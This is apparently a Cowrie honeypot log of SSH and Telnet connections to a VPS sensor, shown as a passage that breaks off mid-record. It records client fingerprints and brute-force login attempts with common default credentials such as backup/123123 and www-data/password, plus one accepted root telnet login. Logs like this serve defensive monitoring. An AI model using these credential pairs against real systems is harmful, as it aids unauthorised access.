{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41894,"dst_ip":"1.2.3.4","dst_port":22,"session":"80ded382cb17","protocol":"ssh","message":"New connection: 212.227.125.160:41894 (1.2.3.4:22) [session: 80ded382cb17]","sensor":"my-vps","timestamp":"2025-08-28T12:28:05.261966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:28:05.262868Z","src_ip":"212.227.125.160","session":"80ded382cb17"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:28:05.454858Z","src_ip":"212.227.125.160","session":"80ded382cb17"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123123","message":"login attempt [backup/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:28:06.085774Z","src_ip":"212.227.125.160","session":"80ded382cb17"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:28:07.255043Z","src_ip":"212.227.125.160","session":"80ded382cb17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48258,"dst_ip":"1.2.3.4","dst_port":22,"session":"71b7867cc8c2","protocol":"ssh","message":"New connection: 212.227.125.160:48258 (1.2.3.4:22) [session: 71b7867cc8c2]","sensor":"my-vps","timestamp":"2025-08-28T12:28:46.026522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:28:46.029922Z","src_ip":"212.227.125.160","session":"71b7867cc8c2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:28:46.232404Z","src_ip":"212.227.125.160","session":"71b7867cc8c2"}
{"eventid":"cowrie.login.failed","username":"backup","password":"111111","message":"login attempt [backup/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:28:47.047369Z","src_ip":"212.227.125.160","session":"71b7867cc8c2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:28:48.224169Z","src_ip":"212.227.125.160","session":"71b7867cc8c2"}
{"eventid":"cowrie.session.connect","src_ip":"104.234.115.215","src_port":21082,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6df79cc800d","protocol":"ssh","message":"New connection: 104.234.115.215:21082 (1.2.3.4:22) [session: f6df79cc800d]","sensor":"my-vps","timestamp":"2025-08-28T12:28:48.679096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T12:28:48.783639Z","src_ip":"104.234.115.215","session":"f6df79cc800d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:28:48.910825Z","src_ip":"104.234.115.215","session":"f6df79cc800d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:28:49.019548Z","src_ip":"104.234.115.215","session":"f6df79cc800d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:28:49.021034Z","src_ip":"104.234.115.215","session":"f6df79cc800d"}
{"eventid":"cowrie.session.connect","src_ip":"104.234.115.215","src_port":36092,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9a044757ae5","protocol":"ssh","message":"New connection: 104.234.115.215:36092 (1.2.3.4:22) [session: f9a044757ae5]","sensor":"my-vps","timestamp":"2025-08-28T12:29:07.421098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:29:07.616700Z","src_ip":"104.234.115.215","session":"f9a044757ae5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:29:12.502614Z","src_ip":"104.234.115.215","session":"f9a044757ae5"}
{"eventid":"cowrie.session.closed","duration":"14.2","message":"Connection lost after 14.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:29:21.617615Z","src_ip":"104.234.115.215","session":"f9a044757ae5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54922,"dst_ip":"1.2.3.4","dst_port":22,"session":"704dc923d79a","protocol":"ssh","message":"New connection: 212.227.125.160:54922 (1.2.3.4:22) [session: 704dc923d79a]","sensor":"my-vps","timestamp":"2025-08-28T12:29:26.929709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:29:26.930686Z","src_ip":"212.227.125.160","session":"704dc923d79a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:29:27.103686Z","src_ip":"212.227.125.160","session":"704dc923d79a"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234567","message":"login attempt [backup/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:29:27.862231Z","src_ip":"212.227.125.160","session":"704dc923d79a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:29:29.036165Z","src_ip":"212.227.125.160","session":"704dc923d79a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53534,"dst_ip":"1.2.3.4","dst_port":22,"session":"24cc6af85026","protocol":"ssh","message":"New connection: 212.227.125.160:53534 (1.2.3.4:22) [session: 24cc6af85026]","sensor":"my-vps","timestamp":"2025-08-28T12:30:07.224576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:30:07.225650Z","src_ip":"212.227.125.160","session":"24cc6af85026"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:30:07.403373Z","src_ip":"212.227.125.160","session":"24cc6af85026"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123456","message":"login attempt [www-data/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:30:07.939848Z","src_ip":"212.227.125.160","session":"24cc6af85026"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:30:09.204334Z","src_ip":"212.227.125.160","session":"24cc6af85026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39086,"dst_ip":"1.2.3.4","dst_port":22,"session":"2694789ec2ac","protocol":"ssh","message":"New connection: 212.227.125.160:39086 (1.2.3.4:22) [session: 2694789ec2ac]","sensor":"my-vps","timestamp":"2025-08-28T12:30:47.583768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:30:47.584727Z","src_ip":"212.227.125.160","session":"2694789ec2ac"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:30:47.751277Z","src_ip":"212.227.125.160","session":"2694789ec2ac"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"password","message":"login attempt [www-data/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:30:48.259147Z","src_ip":"212.227.125.160","session":"2694789ec2ac"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:30:49.427401Z","src_ip":"212.227.125.160","session":"2694789ec2ac"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":53040,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3e8fadd5a33","protocol":"telnet","message":"New connection: 176.65.149.186:53040 (1.2.3.4:23) [session: b3e8fadd5a33]","sensor":"my-vps","timestamp":"2025-08-28T12:30:58.662917Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:30:58.703671Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:30:58.724816Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T12:30:58.726573Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T12:30:58.728199Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55738,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8c365d12d20","protocol":"ssh","message":"New connection: 212.227.125.160:55738 (1.2.3.4:22) [session: d8c365d12d20]","sensor":"my-vps","timestamp":"2025-08-28T12:31:27.975828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:31:27.984920Z","src_ip":"212.227.125.160","session":"d8c365d12d20"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:31:28.147125Z","src_ip":"212.227.125.160","session":"d8c365d12d20"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123456789","message":"login attempt [www-data/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:31:28.989820Z","src_ip":"212.227.125.160","session":"d8c365d12d20"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:31:30.163646Z","src_ip":"212.227.125.160","session":"d8c365d12d20"}
{"eventid":"cowrie.session.connect","src_ip":"118.43.92.121","src_port":43202,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffab0c53fb36","protocol":"telnet","message":"New connection: 118.43.92.121:43202 (1.2.3.4:23) [session: ffab0c53fb36]","sensor":"my-vps","timestamp":"2025-08-28T12:31:35.095200Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65064,"dst_ip":"1.2.3.4","dst_port":22,"session":"21949cf6cc83","protocol":"ssh","message":"New connection: 217.72.205.35:65064 (1.2.3.4:22) [session: 21949cf6cc83]","sensor":"my-vps","timestamp":"2025-08-28T12:31:52.371995Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:31:52.373209Z","src_ip":"217.72.205.35","session":"21949cf6cc83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25479,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b3e2858f49d","protocol":"ssh","message":"New connection: 212.227.235.229:25479 (1.2.3.4:22) [session: 3b3e2858f49d]","sensor":"my-vps","timestamp":"2025-08-28T12:32:00.475514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:32:00.754989Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr